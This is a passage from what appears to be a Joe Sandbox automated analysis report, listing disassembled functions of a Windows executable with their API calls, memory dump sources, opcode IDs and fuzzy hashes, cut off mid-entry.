                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785244153.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: Menu$Item$DrawInfoInsert
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: 0
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 3076010158-4108050209
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 1799694fe08fa7a149e3e917ddeca428ef12783b8609c92dee7a023332204936
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 7b58e0297b022ec9ba855d833b0382692745775969200e6848d17b537ef0d45f
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1799694fe08fa7a149e3e917ddeca428ef12783b8609c92dee7a023332204936
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1F417975A00209AFEB10DF55D884B9FB7B5FF59300F14852EE9059B390DB74A845CFA8
                                                                                                                                                                                                                                                                                                                                                                                                                                Function 00469CDB Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 100windowCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                                                                                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00469D69
                                                                                                                                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00469D7C
                                                                                                                                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00000189,00000000,00000000), ref: 00469DAC
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784898310.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784996228.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785095811.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785137116.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785244153.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: MessageSend$_memmove_wcslen
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: ComboBox$ListBox
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 1589278365-1403004172
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 4395ff4c2c8cdf0c8fa99ec605851f177d12593d5a8a66f2884a0b9051c55526
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: b025c67d46b61e1fa51b41144ded2117d8c1ab71acdc4e5cb50a5164a05e923b
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4395ff4c2c8cdf0c8fa99ec605851f177d12593d5a8a66f2884a0b9051c55526
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8D31287160010477DB10BB69CC45BEF775C9F86324F10852FF918AB2D1DABC9E4583A6
                                                                                                                                                                                                                                                                                                                                                                                                                                Function 00443442 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 93COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784898310.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784996228.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785095811.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785137116.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785244153.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: Handle
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: nul
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 2519475695-2873401336
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: efdaae6ab43bf4356d88622121a7e42c7f624cc6de1d12637521731ec53ca4c5
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 058e2060cb23de8d889deff533ab301820a4ae088d702658d54b05e79d5a48de
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: efdaae6ab43bf4356d88622121a7e42c7f624cc6de1d12637521731ec53ca4c5
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 84319571500204ABEB20DF68DC46BEB77A8EF04721F104A4EFD50973D1E7B59A50CBA5
                                                                                                                                                                                                                                                                                                                                                                                                                                Function 0044334F Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 92COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetStdHandle.KERNEL32(000000F6), ref: 0044337D
                                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784898310.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784996228.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785095811.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785137116.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785244153.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: Handle
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: nul
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 2519475695-2873401336
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 97b946d9a765a46b1e85699804a5cf49c651f34dfecb3a2317456e71fe30ed78
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 7fb8f1e98e57093f7bc771e71f756598ee5282d4f5ffeaa4ddc08f3ab3272662
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 97b946d9a765a46b1e85699804a5cf49c651f34dfecb3a2317456e71fe30ed78
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 05219331600204ABE720DF689C49FAB77A8EF55731F20474EFDA0972D0EBB59A50C795
                                                                                                                                                                                                                                                                                                                                                                                                                                Function 00440C49 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 91COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784898310.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784996228.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785095811.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785137116.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785244153.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: SysAnimate32
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 0-1011021900
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 8caf53187f6e77aecacb49307b2e697766faa1bc511b1160dce697a174d3407c
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: b1a10ecfd0a3fc3d2af2854cd73c9de1262d8b9fd4b2252518a975ef6c54cff1
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8caf53187f6e77aecacb49307b2e697766faa1bc511b1160dce697a174d3407c
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0D21C975600205ABFB149EA9EC81FAB73DCEB95324F20471BF711972C0D279EC518768
                                                                                                                                                                                                                                                                                                                                                                                                                                Function 00461554 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 74windowCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 0043646A: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 00436489
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 0043646A: GetWindowThreadProcessId.USER32(?,00000000), ref: 0043649C
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 0043646A: GetCurrentThreadId.KERNEL32 ref: 004364A3
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 0043646A: AttachThreadInput.USER32(00000000), ref: 004364AA
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetFocus.USER32 ref: 0046157B
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 004364B5: GetParent.USER32(?), ref: 004364C3
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 004364B5: GetParent.USER32(?), ref: 004364CF
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetClassNameW.USER32(?,?,00000100), ref: 004615C4
                                                                                                                                                                                                                                                                                                                                                                                                                                • EnumChildWindows.USER32(?,Function_00045B98,?), ref: 004615EF
                                                                                                                                                                                                                                                                                                                                                                                                                                • __swprintf.LIBCMT ref: 00461608
                                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784898310.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784996228.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785095811.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785137116.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785244153.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: Thread$Parent$AttachChildClassCurrentEnumFocusInputMessageNameProcessSendTimeoutWindowWindows__swprintf_memmove_wcslen
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: %s%d
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 2645982514-1110647743
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 964dbc2a73d3b51658c129c0940897b8911b785c40af9afe88b96a44e5c449bd
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 8eac61321038dbd32bfe14263504560db7c98c8fbeeeb2eb49a46d34c9d63f73
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 964dbc2a73d3b51658c129c0940897b8911b785c40af9afe88b96a44e5c449bd
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 272180756007096BD610AF69DC89FAF73A8FB88704F00841FF918A7241DAB8A9418B69
                                                                                                                                                                                                                                                                                                                                                                                                                                Function 00462A31 Relevance: 7.7, APIs: 5, Instructions: 227COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784898310.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784996228.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785095811.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785137116.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785244153.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 0beeaaa579c9339ee211e6c40176bce708d39a94b7630d2852c1f2343b6e5e4f
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: b0f148a0463f8e77612455c4d0488571574065cadd758f34d18f988e9301810f
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0beeaaa579c9339ee211e6c40176bce708d39a94b7630d2852c1f2343b6e5e4f
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2A819F74600604BFEB24CF95C994FBB7B68EF59350F10804EF8959B341E6B8AC45CB6A
                                                                                                                                                                                                                                                                                                                                                                                                                                Function 004757A7 Relevance: 7.7, APIs: 5, Instructions: 220COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetCurrentProcessId.KERNEL32(?), ref: 0047584D
                                                                                                                                                                                                                                                                                                                                                                                                                                • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 0047585B
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetProcessIoCounters.KERNEL32(00000000,?), ref: 0047587F
                                                                                                                                                                                                                                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 00475A4D
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784898310.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784996228.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785095811.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785137116.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785244153.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: Process$CloseCountersCurrentHandleOpen
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 3488606520-0
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: ce4ed15879a0d4705bc9675b55154bd71a0022cbb1f9dd3a70cee976304ba055
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 747e8e91012d04cc7bcfbda4f2b49d0ca9967bea8b965680eccea6cdbc9dea0c
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ce4ed15879a0d4705bc9675b55154bd71a0022cbb1f9dd3a70cee976304ba055
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 82817170A047029FD310DF65C981B4BBBE1BF84704F10892EF6999B3D2DA75E944CB96
                                                                                                                                                                                                                                                                                                                                                                                                                                Function 0046B4CF Relevance: 7.7, APIs: 5, Instructions: 157registryCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                                                                                                                                                                                                                                                                                                                                                                                • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046B5B5
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784898310.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784996228.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785095811.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785137116.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785244153.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: ConnectRegistry_memmove_wcslen
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 15295421-0
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: d8d3d6a2cecaed762a510ed52f320a3b4f5546c74b9e94ec6e10ba7928b5d5b3
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 481e56be03c4cee60d8ca92471cfa4b3875eab78bcfcbf7fb961631f720e0f99
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d8d3d6a2cecaed762a510ed52f320a3b4f5546c74b9e94ec6e10ba7928b5d5b3
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7D515F71208301ABD304EF65C885E5BB7A8FF88704F10892EB54597291D774E945CBA6
                                                                                                                                                                                                                                                                                                                                                                                                                                Function 00464812 Relevance: 7.6, APIs: 5, Instructions: 145libraryloaderCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                • LoadLibraryW.KERNEL32(00000000,?,?,?), ref: 0046485D
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(?,?), ref: 004648F7
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(?,00000000), ref: 00464916
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(?,?), ref: 0046495A
                                                                                                                                                                                                                                                                                                                                                                                                                                • FreeLibrary.KERNEL32(?,?,?,?), ref: 0046497C
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784898310.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784996228.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785095811.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785137116.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785244153.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: AddressProc$Library$FreeLoad
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 2449869053-0
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 178b694003ef1c8c6ddf6c03964e3c93f4f33891ff2eeadba8088ba5e41252f8
